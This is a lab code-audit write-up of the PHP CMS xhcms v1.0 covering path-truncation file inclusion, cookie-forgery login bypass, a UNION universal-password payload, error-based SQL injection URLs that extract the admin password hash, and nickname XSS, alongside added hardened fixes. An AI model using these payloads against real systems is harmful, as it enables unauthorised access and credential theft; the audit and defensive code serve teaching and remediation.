Environment:
Windows 7 virtual machine
phpstudy2018
PHP 5.2.17 + Apache
xhcms_v1.0
The entry file:
<?php
// single-entry mode
error_reporting(0); // turn off error display
$file=addslashes($_GET['r']); // receive the file name
$action=$file==''?'index':$file; // if empty, default to index
include('files/'.$action.'.php'); // load the corresponding file
?>
addslashes() returns a string with a backslash added before each predefined character.
The predefined characters are:
single quote (')
double quote (")
backslash (\)
NUL
So a %00 truncation on this file include definitely will not work: the NUL byte becomes the two characters \0 and no longer terminates the path.
? truncation: test failed.
. truncation: succeeded. (PHP 5.2 on Windows truncates an over-long include path at its maximum path length, and the filesystem ignores the trailing dots that remain, so the appended .php never reaches the disk.)
http://www.xhcms.com/?r=../1.txt................................ (the run of trailing dots continues for several hundred characters)
/. truncation, tested at length 205:
http://www.xhcms.com/?r=../1.txt/./././././././././././. (the /. segment is repeated many more times)
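As an added example (not code from the original post or from xhcms), the following shows what addslashes() actually does to the four characters it handles, which explains the three test results above, and then a hardened version of the entry dispatcher that validates the action name with a whitelist and a realpath() check instead of relying on addslashes(). Function names, the files/ layout and the PHP 7+ syntax are assumptions; it would not run unchanged on the PHP 5.2 test box.

```php
<?php
// Added example, not xhcms code.
// addslashes() only touches ' " \ and NUL. The NUL becomes the two
// characters \0, so the null byte no longer terminates the path; dots and
// slashes are passed through untouched, which is what the path-padding
// tests rely on.
function addslashesEffects(): array {
    return [
        'single quote' => addslashes("a'b"),          // a\'b
        'NUL byte'     => addslashes("a\0b"),         // a\0b: backslash + digit 0, 4 bytes
        'dots/slashes' => addslashes('../1.txt/./.'), // unchanged
    ];
}

// Hardened replacement for the entry file's include logic. The action must
// be a short identifier and must resolve to an existing file under files/;
// anything else falls back to index. $baseDir is assumed to be the
// directory that contains files/.
function resolveAction(string $r, string $baseDir): string {
    $action = ($r === '') ? 'index' : $r;

    // Whitelist first: letters, digits and underscore only. Dots, slashes,
    // NUL bytes and URL schemes are rejected before any filesystem call
    // sees them. The D modifier stops $ from matching before a trailing
    // newline.
    if (!preg_match('/^[a-z0-9_]{1,32}$/D', $action)) {
        return 'index';
    }

    // Second line of defence: resolve the canonical path and confirm it is
    // inside files/. realpath() normalises ../ and Windows trailing-dot
    // forms, so the prefix comparison is made on the real location.
    $root   = realpath($baseDir . DIRECTORY_SEPARATOR . 'files');
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . 'files'
                       . DIRECTORY_SEPARATOR . $action . '.php');
    if ($root === false || $target === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return 'index';
    }
    return $action;
}

// In the real entry file the last lines would be:
//   $r = (isset($_GET['r']) && is_string($_GET['r'])) ? $_GET['r'] : '';
//   include __DIR__ . '/files/' . resolveAction($r, __DIR__) . '.php';

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a normal value plus the two padding payloads.
    print_r(addslashesEffects());
    foreach (['', 'software', '../1.txt....', '../1.txt/./././.'] as $r) {
        // Without a files/ directory present every value resolves to
        // 'index'; the point is that the padded paths never reach include().
        printf("%-22s -> %s\n", var_export($r, true), resolveAction($r, __DIR__));
    }
}
```

The whitelist alone is enough to stop both truncation tricks; the realpath() check is defence in depth for the case where a later edit loosens the pattern.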
The same reasoning applies here:
<?php
// single-entry mode
error_reporting(0); // turn off error display
$file=addslashes($_GET['r']); // receive the file name
$action=$file==''?'index':$file; // if empty, default to index
include('files/'.$action.'.php'); // load the corresponding file
?>
Now let's audit the backend login.
First, from the entry code just above, let's see why visiting the backend leaves action equal to,
if it is empty, action falls back to index, so files/index.php is included:
<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$indexopen='class="open"';
?>
This includes:
<?php
$user=$_COOKIE['user'];
if($user==""){
header("Location: ?r=login");
exit;
}
?>
Here the cookie is checked; since there is no cookie, it redirects to the login page.
But it is also obvious that the cookie can be forged so that it does not redirect to login,
which logs you in directly.
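As an added example (not part of the original post and not xhcms code), this is what checklogin.php's check looks like once the cookie value is authenticated by the server: the cookie carries the user name, an expiry and an HMAC over both, so a client that simply sets a user name of its own choosing is rejected. The cookie name, the token format and the secret constant are assumptions; in a real deployment the secret would be loaded from a config file outside the web root, and a server-side session is the simpler alternative.

```php
<?php
// Added example, not xhcms code. Replaces the bare $_COOKIE['user'] trust
// with an HMAC-authenticated cookie.
const LOGIN_SECRET = 'replace-with-a-long-random-secret'; // assumption: from config in real use

// Build "user|expiry|hmac". Only the server knows LOGIN_SECRET, so only the
// server can produce a valid third field.
function issueLoginToken(string $user, int $ttlSeconds, ?int $now = null): string {
    $now = $now ?? time();
    $payload = $user . '|' . ($now + $ttlSeconds);
    return $payload . '|' . hash_hmac('sha256', $payload, LOGIN_SECRET);
}

// Returns the user name on success, null on any failure (missing, malformed,
// expired, or MAC mismatch). hash_equals() keeps the comparison constant-time.
function verifyLoginToken(?string $token, ?int $now = null): ?string {
    $now = $now ?? time();
    if ($token === null) {
        return null;
    }
    $parts = explode('|', $token);
    if (count($parts) !== 3) {
        return null;                       // malformed, or a '|' inside the name
    }
    [$user, $exp, $mac] = $parts;
    if (!ctype_digit($exp) || (int)$exp < $now) {
        return null;                       // expired or tampered expiry
    }
    $expected = hash_hmac('sha256', $user . '|' . $exp, LOGIN_SECRET);
    if (!hash_equals($expected, $mac)) {
        return null;                       // forged or tampered
    }
    return $user;
}

// Drop-in replacement for the logic in checklogin.php.
function requireLogin(): string {
    $user = verifyLoginToken($_COOKIE['auth'] ?? null);
    if ($user === null) {
        header('Location: ?r=login');
        exit;
    }
    return $user;
}

// Where login.php currently calls setcookie('user', $user, ...), it would instead do:
//   setcookie('auth', issueLoginToken($user, 3600 * 24 * 30),
//             ['path' => '/', 'httponly' => true, 'samesite' => 'Lax']);

if (PHP_SAPI === 'cli') {
    // Constructed self-check with a fixed clock.
    $t = issueLoginToken('admin', 60, 1000);
    var_dump(verifyLoginToken($t, 1001));                    // string(5) "admin"
    var_dump(verifyLoginToken('admin|2000|deadbeef', 1001)); // NULL: forged MAC
    var_dump(verifyLoginToken($t, 2000));                    // NULL: expired
}
```

Rotating LOGIN_SECRET invalidates every outstanding cookie at once, which is the intended way to force a global logout.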
Now let's look at the normal login flow with a username and password:
<?php
ob_start();
require '../inc/conn.php';
$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];
if($login<>""){
// $user is interpolated into the SQL without escaping or parameter binding
$query="SELECT * FROM manage WHERE user='$user'";
$result=mysql_query($query) or die('SQL语句有误:'.mysql_error());
$users=mysql_fetch_array($result);
if(!mysql_num_rows($result)) {
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
$passwords=$users['password'];
if(md5($password)<>$passwords){
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}
// write the login info and remember it for 30 days
// the cookie holds only the bare user name, which checklogin.php later trusts
if($checkbox==1){
setcookie('user',$user,time()+3600*24*30,'/');
}else{
setcookie('user',$user,0,'/');
}
echo "<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>
Here it looks up the user name, and only then checks whether the md5 of the submitted password equals the stored value.
So we can construct a universal password. Whether it works depends on the php.ini configuration and the MySQL character set; the MySQL character set here is utf-8,
and if the option in php.ini is off, the injection exists; if it is on, it does not.
For now we test with it turned off.
First, note that the table has 8 columns,
and the fourth is the password.
Construct:
Username: 1' union select 1,2,3,md5(4),5,6,7,8# Password: 4
Login succeeds.
Of course other injection techniques also work here, such as error-based injection.
Next, the software page (reached via ?r=software):
<?php
require 'inc/conn.php';
require 'inc/time.class.php';
$query="SELECT * FROM settings";
$resul=mysql_query($query) or die('SQL语句有误:'.mysql_error());
$info=mysql_fetch_array($resul);
$id=addslashes($_GET['cid']);
$query="SELECT * FROM download WHERE id='$id'";
$resul=mysql_query($query) or die('SQL语句有误:'.mysql_error());
$download=mysql_fetch_array($resul);
// view counter: $id is used in a numeric context, so addslashes() offers no protection
$query="UPDATE download SET hit=hit+1 WHERE id=$id";
@mysql_query($query) or die('修改错误:'.mysql_error());
?>
The view-counter query has no single-quote protection, so it is injectable.
Error-based injection works:
http://www.xhcms.com/?r=software&cid=1 or extractvalue(1,concat(0x7e,substr((select group_concat(password) from manage),1,30),0x7e))#
http://www.xhcms.com/?r=software&cid=1 or extractvalue(1,concat(0x7e,substr((select group_concat(password) from manage),31,30),0x7e))#
These return, respectively:
修改错误:XPATH syntax error: '~21232f297a57a5a743894a0e4a801f~'
修改错误:XPATH syntax error: '~c3~'
Concatenated: 21232f297a57a5a743894a0e4a801fc3
This yields the password.
There is also one more that is the same as this.
Of course there are many more SQL injections after logging into the backend; I will not go through them one by one here.
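As an added example that is not part of the original post or of xhcms, the following puts the two injection points side by side: the login query, where the user name is a quoted string and no escaping is applied at all, and the view counter, where addslashes() is applied but is useless because the value sits in a numeric context and no quote ever needs closing. Parameterised queries fix both shapes, and password_verify() replaces the md5 comparison. It uses an in-memory SQLite database through PDO (constructed tables; column names assumed) so it runs offline; the vulnerable query builders are shown only as strings, since SQLite has neither MySQL's # comment nor extractvalue().

```php
<?php
// Added example, not xhcms code.

function openDemoDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed stand-ins for the manage and download tables.
    $pdo->exec('CREATE TABLE manage (id INTEGER PRIMARY KEY, user TEXT, password TEXT)');
    $pdo->exec('CREATE TABLE download (id INTEGER PRIMARY KEY, name TEXT, hit INTEGER DEFAULT 0)');
    $ins = $pdo->prepare('INSERT INTO manage (user, password) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
    $pdo->exec("INSERT INTO download (name) VALUES ('tool.zip')");
    return $pdo;
}

// Vulnerable shape from login.php, as a string builder only.
function vulnerableLoginSql(string $user): string {
    return "SELECT * FROM manage WHERE user='" . $user . "'";
}

// Hardened login: the user name travels as a bound parameter, so quotes and
// the union keyword stay inside the string value and never become SQL. The
// stored hash is checked with password_verify() rather than comparing md5().
function login(PDO $pdo, string $user, string $password): bool {
    $stmt = $pdo->prepare('SELECT password FROM manage WHERE user = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password']);
}

// Vulnerable shape from the software page: addslashes() leaves "1 or ..." intact
// because there is no quote, double quote, backslash or NUL to escape.
function vulnerableHitSql(string $cid): string {
    return 'UPDATE download SET hit=hit+1 WHERE id=' . addslashes($cid);
}

// Hardened counter: reject anything that is not a plain positive integer,
// then bind it as an integer. Returns the new hit count, or null when the id
// was invalid or matched no row.
function incrementHit(PDO $pdo, string $cid): ?int {
    if (!ctype_digit($cid)) {
        return null;                                   // nothing reaches SQL
    }
    $id = (int)$cid;
    $upd = $pdo->prepare('UPDATE download SET hit = hit + 1 WHERE id = :id');
    $upd->bindValue(':id', $id, PDO::PARAM_INT);
    $upd->execute();
    if ($upd->rowCount() === 0) {
        return null;
    }
    $sel = $pdo->prepare('SELECT hit FROM download WHERE id = :id');
    $sel->bindValue(':id', $id, PDO::PARAM_INT);
    $sel->execute();
    return (int)$sel->fetchColumn();
}

if (PHP_SAPI === 'cli') {
    $pdo = openDemoDb();
    // The universal-password payload from the post, as the query it produces:
    echo vulnerableLoginSql("1' union select 1,2,3,md5(4),5,6,7,8#"), "\n";
    // With binding, the same input is just an unknown user name.
    var_dump(login($pdo, "1' union select 1,2,3,md5(4),5,6,7,8#", '4')); // bool(false)
    var_dump(login($pdo, 'admin', 'correct horse'));                     // bool(true)
    // Numeric context: addslashes() changes nothing in the string below.
    echo vulnerableHitSql('1 or 1=1'), "\n";
    var_dump(incrementHit($pdo, '1 or 1=1')); // NULL: rejected by ctype_digit()
    var_dump(incrementHit($pdo, '1'));        // int(1)
}
```

The ctype_digit() check is what closes the numeric case: binding with PDO::PARAM_INT would also have coerced the value, but rejecting it up front means a malformed cid is logged as a bad request rather than silently counted against id 1.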
Next, try the comment feature.
Only the XSS in the nickname field shows up here.
The XSS in the comment body is filtered; tracing back through the code to see why:
Capturing the request makes it obvious; the corresponding file is
line 48, where it is filtered:
$content=addslashes(strip_tags($content));// strip HTML
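As an added example (not from the original post or from xhcms), this shows why the comment body did not fire while the nickname did, and the fix a reviewer would ask for: encode every field on output, for the HTML context it lands in, rather than relying on strip_tags() on one field at input time. addslashes() plays no part in XSS defence at all; it targets SQL quoting. The row layout and function names are assumptions.

```php
<?php
// Added example, not xhcms code.

// One encoder for HTML text and attribute values. ENT_QUOTES also encodes
// the single quote so the result is safe inside single-quoted attributes;
// ENT_SUBSTITUTE keeps invalid UTF-8 from blanking the whole string.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Mirrors the current behaviour: the body went through strip_tags() when it
// was stored, the nickname did not, and both are echoed as-is.
function renderCommentUnsafe(array $c): string {
    return '<div class="comment"><b>' . $c['nick'] . '</b>: '
         . strip_tags($c['content']) . '</div>';
}

// Hardened: every untrusted value is encoded at the point it enters HTML,
// including the attribute copy of the nickname.
function renderCommentSafe(array $c): string {
    return '<div class="comment" data-nick="' . e($c['nick']) . '"><b>'
         . e($c['nick']) . '</b>: ' . e($c['content']) . '</div>';
}

if (PHP_SAPI === 'cli') {
    // Constructed sample row.
    $comment = [
        'nick'    => '<script>alert(1)</script>',
        'content' => 'hello <b>world</b>',
    ];
    echo renderCommentUnsafe($comment), "\n"; // the script element in the nickname reaches the browser
    echo renderCommentSafe($comment), "\n";   // &lt;script&gt;alert(1)&lt;/script&gt; ... hello &lt;b&gt;world&lt;/b&gt;
}
```

strip_tags() can stay as a content policy for the comment body if plain text is wanted, but it is not the security control; the output encoder is, and it has to be applied to every field that reaches the page.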